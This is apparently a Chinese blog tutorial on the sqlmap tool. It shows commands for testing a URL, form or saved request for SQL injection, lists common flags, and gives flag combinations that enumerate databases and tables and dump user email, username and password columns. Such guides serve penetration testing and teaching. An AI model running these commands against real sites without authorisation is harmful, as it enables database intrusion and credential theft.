先安装 python环境(2.6.x或2.7版本) ,再将SQLMap 放在安装目录下

注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。

检测注入点是否可用 -u :注入点url

sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

检测表单post提交 注入

sqlmap.py -u "http://192.168.1.150/products.asp" --forms

指定请求文件进行验证注入,可以用fiddle拦截请求并保存为文件
image

sqlmap.py -r "C:\Users\Administrator\Desktop\RawFile.html" --dbs

常用参数简介

注意大小写和前面的横杠数量

–dbs //指定输出所有数据库名称
–current-db //输出web当前使用数据库
–current-user //输出当前数据库用户名称
–users //输出所有用户名称
–passwords //输出所有用户密码
–tables //输出所有表名称
–columns //输出所有字段名称
–dump //导出结果
–technique //设置用于注入的技术
–dbms //指定测试的数据库类型
–start //指定开始的行
–stop //指定结束的行
-D //指定数据库名称
-T //指定表名称
-C //指定字段名称
-u //指定进行sql注入的http地址
-p //指定进行sql注入的参数
-r //指定进行sql注入的请求文件

常用参数搭配

1.输出DatabaseName数据库中所有表名称

-D DatabaseName --tables

2.输出DatabaseName数据库users表中的所有字段名称

-D DatabaseName -T users --columns 

3.导出DatabaseName数据库users表中UserName,UserPassword字段数据

-D DatabaseName -T users -C "email,Username,userpassword" --dump  

4.导出从1到10的10行数据

-D DatabaseName -T users -C "email,Username,userpassword" --start 1 --stop 10 --dump  

版权声明:本文为cplemom原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://www.cnblogs.com/cplemom/p/11406080.html